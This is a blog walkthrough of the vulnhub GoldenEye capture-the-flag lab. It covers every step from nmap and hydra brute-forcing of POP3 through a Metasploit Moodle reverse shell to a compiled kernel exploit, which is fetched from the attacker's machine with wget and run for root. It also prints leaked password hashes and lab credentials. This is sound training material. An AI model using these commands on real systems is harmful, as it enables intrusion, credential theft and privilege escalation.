This vulnhub Goldeneye walkthrough will show you every step in detail on how to get root level access and capture the final flag step by step. If you would rather setup your own free pentesting labs see my post on how to do so.
Table of Contents
Here’s What You Need
- Kali Linux Virtual Machine – VirtualBox
- Goldeneye CTF Virtual Machine – vulnhub.com
Summary
What I enjoy most about this ctf challenge is that the Goldeneye machine is so engrossed in everything about Goldeneye the film. There is a touch and feel to this box that invites you in to explore the details and leaves you feeling like a real Bond. Wether it comes from the feeling of working with other agents or finding simple notes that defectors have left for you there is something genuine about this ctf challenge.
On a technical level this box is very similar to OSCP style boxes. It is not like most of the vulnhub ctf machines that are brain-twisting mind puzzles which most people do not like. For example the author has configured open source e-learning software for example inviting you to exploit it to achieve root level access on the box.
Setup
I imported the ova file I downloaded from vulnhub into VirtualBox. Next I added a network adapter, a bridged adapter and then started up the VM.
With the GoldenEye movie playing on my tv let’s get started!
What I will cover
- How to use gobuster
- How to use dirb
- How to use AutoRecon
- How to use seclists
- How to use nmap
- How to exploit Moodle
- How to use Burp Suite Decoder
- How to use cc to compile exploits
- How to use LinEnum for Linux privilege escalation
- How to get files onto the target post exploitation
vulnhub Goldeneye walkthrough: remote enumeration
First remote enumeration is done through an nmap scan. This scan tells me that ports 25 and 80 are open. That means we can learn more about the services running on HTTP and SMTP or even POP3.
I also run AutoRecon and check the results of the AutoRecon scan. They reveal that there are several other open ports. This will be useful later.
[*] smtp found on tcp/25.
[*] http found on tcp/80.
[*] ssl/unknown found on tcp/55006.
[*] pop3 found on tcp/55007.I try uncovering hidden directories that any user may have read or write access to by using gobuster and dirb, but there is nothing open.
gobuster dir -u http://10.0.0.206 -w ~/seclists/Discovery/Web-Content/common.txt -vKnowing that port 80 is open, I navigate to the target’s address in a browser. You may recognize the name here which is slightly different from the one in the 007 film, Space Weapons Control Center located in Severnaya, Russia.
Go to /sev-home/ and try to login
The page instructions hold the first clue, suggesting that i go to /sev-home to login. Doing so opens a new page with a login form. I try the default credentials such as admin:admin and others, but with no luck.
Inspect the page source: /sev-home/
My next move is to inspect the page source for 10.0.0.206/sev-home/.
I inspect the page source to look for the first clue. There is a javascript file named terminal.js so I click on it and now we see some interesting notes in the comments section of the script.
Doing so reveals the next clue!
What is given in the comments of the page source is an encoded password per the instructions. Trying cyberchef and other options I move ahead with Burp Decoder, using the smart decode option.
In doing so we have a password! InvincibleHack3r which means that our credentials to try a new login are boris:InvincibleHack3r.
Successfully logging in with the credentials means we are now logged into the /sev-home/ page. I am invincible! – Boris
Login using the new credentials
There is a new graphic playing on repeat in the page you can take a break and watch it over and over, but then continue on!
Although Boris and Natalya are specifically mentioned in the comments, it is the lowercase version of the two names that serve as viable usernames here. This means that only when using boris and natalya will you get a successful login to the /sev-home/ endpoint.
Looking closely at the /sev-home/ Goldeneye gif without getting distracted by the awesome graphics we can see the following.
“since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port.”
During the inital remote enumeration was there a POP3 service identified as running on a high number port?
Hacking the POP3 service
Brute force usernames and passwords
I have two usernames but what about their passwords? For this I use hydra in order to brute force the possible passwords for boris and natalya.
hydra -l boris -P /usr/share/wordlists/rockyou.txt -f 10.0.0.206 -s 55007 pop3Brute forcing the passwords for the two usernames turns out to be more difficult than any of the previous steps. Cycling through my wordlists runs into auth errors that look like timeouts. After many minutes of trying wordlists there is one list that has a match, the /usr/share/wordlists/fasttrack.txt wordlist. There it is a match! Silly Boris has made his password simple boris:secret1! while it is slightly complex it is also crackable.
The password is simple: what is something you sit on but can’t take with you?
Boris
Do the same process with natalya. It looks like Natalya is still “only a level II programmer”, as Boris says, because her password is simple and easily cracked.
Read the mail messages for clues
I now have the username and password combinations for the two users but how do I hack further to get closer to a true exploit on the target?
One of the neat uses of netcat is that it can connect to TCP ports that are open and interact with them. This is true in this case which means I will connect to the POP3 port 55007 using netcat.
The objective here is to read the system mail for each of the users. Scrolling through Boris’s mail leads nowhere fast. However natalya has the next clue in her mail!
A new set of credentials, username xenia and password RCP90rulez! this step is complex and as the mail mentions there are additional steps to take to progress forward.
Add site to /etc/hosts file
As the mail message says we need to add this domain and its ip address to the hosts file on your Kali machine.
Navigate to http://severnaya-station.com which is now available after adding an entry for it in your hosts file.
Login to Moodle as xenia:RCP90rulez! to proceed. Looking for private messages I find one message with a new clue!
Escalate privileges in Moodle
Dr Doak gives us his username: doak! Repeat the process of hacking the POP3 service to get credentials for doak.
Now to repeat the process with the username doak and password goat
from Doak’s private file message to 007 we learned that he captured admin credentials.
Back to Moodle. Login as doak:4England! and navigate to My Profile then private messages.
Doaks has sent 007 a secret message declaring that he has found the credentials for an admin account. He also says that he can’t paste the password for the account since the Goldeneye servers scan for cleartext credentials across the network.
What does that sound like to you, that is hiding secrets in images? Steganography!
The image must hold some clues so let us download it locally and run strings on it to see what lies inside the file.
The image file has random ASCII strings, but it does have what appears to be a Base64 encoded string which could be a password! Use Burp Decoder again to decode the Base64 encoded password for the admin account.
There is a new credential for an admin account, username admin and password xWinter1995x!
Exploit Moodle 2.23 with Metasploit
Finding the version of Moodle installed is easy enough it can be done by navigating around the site looking for details. Looking at all the available exploits for Moodle 2.23 leads to one that is through Metasploit. *OSCP sigh*
The exploit requires that we enter admin level credentials in order for it to work. We have those now!
msf5 exploit(multi/http/moodle_cmd_exec) > show options
Module options (exploit/multi/http/moodle_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD xWinter1995x! yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.0.206 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersonate
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /gnocertdir yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST severnaya-station.com no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.0.250 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
By default the payload will be cmd/unix/reverse so setting the payload is optional.
Once again the Guru is apparently the only one who covers the little details that every other tutorial leaves out. You have to set the VHOST value to get this exploit to work!
set VHOST severnaya-station.comWhy does it matter? In this scenario severnaya-station.com is a virtual host (VHOST) sitting on 10.0.0.206 the ip address of the target VM.
Now that I have an open shell on the target it is time to do some new enumeration and see where we can escalate privileges to root and somehow grab the flag.
Post exploitation enumeration
Enumeration is not just for the beginning stages of ethical hacking there is always an opportunity to do more enumeration. In fact enumeration is key is an adage that is wise to adopt for every engagement you are part of.
There are many options to do enumeration post exploitation, but I prefer the automated methods. One such method is LinEnum which gathers common misconfigurations and vulnerabilities in Linux systems.
# host LinEnum.sh on the Kali machine
$ python -m SimpleHTTPServer 8000
# upload LinEnum.sh to the target
$ wget https://10.0.0.250:8000/linenum.sh
# run linenum
$ ./linenum.shThe results come back with several promising features, but here are the highlights.
[-] htpasswd found - could contain passwords:
/etc/apache2/.htpasswd
boris:$apr1$vg2drJim$wUDKP9TLw5jq4GS5jq2240
ops:$apr1$mVvEblRU$oHDbEs4QP2YTUG25Z1PoP.We could crack the passwords hashes or as seen below, check what listening ports are running on the target to get a feel for what is exploitable.
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:55006 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:55007 0.0.0.0:* LISTEN -
tcp6 0 0 ::1:5432 :::* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
tcp6 0 0 :::55006 :::* LISTEN -
tcp6 0 0 :::55007 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:55322 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp6 0 0 :::13853 :::* - vulnhub Goldeneye walkthrough – kernel exploit to get root
Using a kernel exploit should be a last resort as it can crash services on the target especially on older systems. But in this case our post exploitation enumeration did not lead to anything promising. That means that a kernel exploit is most likely what is intended by the vulnhub Goldeneye CTF author.
Linux ubuntu 3.13.0-32-genericsearching Google for exploits returns a result from exploitdb and to fetch the exploit I use searchsploit -m 37292 which downloads the exploit file locally.
The compiler on the target VM returns an error sh:1 gcc not found that means that gcc a C compiler, is not installed. You could install gcc but there is another option and it is one that involves what is already installed on the target. We will use cc, the original UIX C compiler, to compile this exploit.
However before that can take place I have to fix something in the exploit script itself. Where the script says gcc I replace it with cc instead.
# compile the kernel exploit on your Kali or on the target using cc
$ cc 37292.c -o exploitThis will compile the exploit and output its binary named “exploit”.
So I have an exploit compiled and ready to go what’s next? Since it is sitting on my Kali VM it is not doing much good so I will upload it to the target using a Python module SimpleHTTPServer. You can also use apache2 but I prefer this method.
# host the exploit binary on Kali
$ python -m SimpleHTTPServer 8000With the exploit hosted I will download it from the shell I have open on the target.
# download the exploit to the target
$ wget http://10.0.0.250:8000/exploitFirst I change the execution permission for the file so that my user www-data can actually execute it. From here I run the exploit which I have just compiled in the previous step and achieve root access as a result.
# chmod permissions
chmod u+x exploit
# run exploit
$./exploit
be sure to go to the final page http://severnaya-station.com//006-final/xvf7-flag/